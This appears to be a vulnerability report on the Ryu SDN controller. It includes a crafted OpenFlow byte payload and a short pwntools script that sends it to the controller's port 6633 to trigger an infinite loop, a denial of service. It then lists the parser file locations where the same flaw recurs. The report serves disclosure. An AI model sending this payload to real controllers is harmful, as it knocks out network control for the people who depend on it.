TokameinE
TokameinE
This message will put ryu into an infinite loop: ```python payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00" ``` ```python from pwn import * p=remote("0.0.0.0",6633) payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` After sending the payload, the controller will no...
in /ryu/ofproto/ofproto_v1_3_parser.py about line=1050 in /ryu/ofproto/ofproto_v1_4_parser.py about line=4453 in /ryu/ofproto/ofproto_v1_3_parser.py about line=5321
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_0_parser.py about line=1186 /ryu/ofproto/ofproto_v1_1_parser.py about line=3105 /ryu/ofproto/ofproto_v1_3_parser.py about line=6026
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=3943 /ryu/ofproto/ofproto_v1_4_parser.py about line=1657 /ryu/ofproto/ofproto_v1_5_parser.py about line=1893
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=139 /ryu/ofproto/ofproto_v1_4_parser.py about line=103 /ryu/ofproto/ofproto_v1_5_parser.py about line=104
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=4083 /ryu/ofproto/ofproto_v1_4_parser.py about line=3486 /ryu/ofproto/ofproto_v1_2_parser.py about line=2279 /ryu/ofproto/ofproto_v1_0_parser.py about line=956
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=5269 /ryu/ofproto/ofproto_v1_4_parser.py about line=1789 /ryu/ofproto/ofproto_v1_5_parser.py about line=2029
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=3607 /ryu/ofproto/ofproto_v1_4_parser.py about line=5416 /ryu/ofproto/ofproto_v1_5_parser.py about line=6495
This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=4685 /ryu/ofproto/ofproto_v1_4_parser.py about line=2548 /ryu/ofproto/ofproto_v1_5_parser.py about line=5893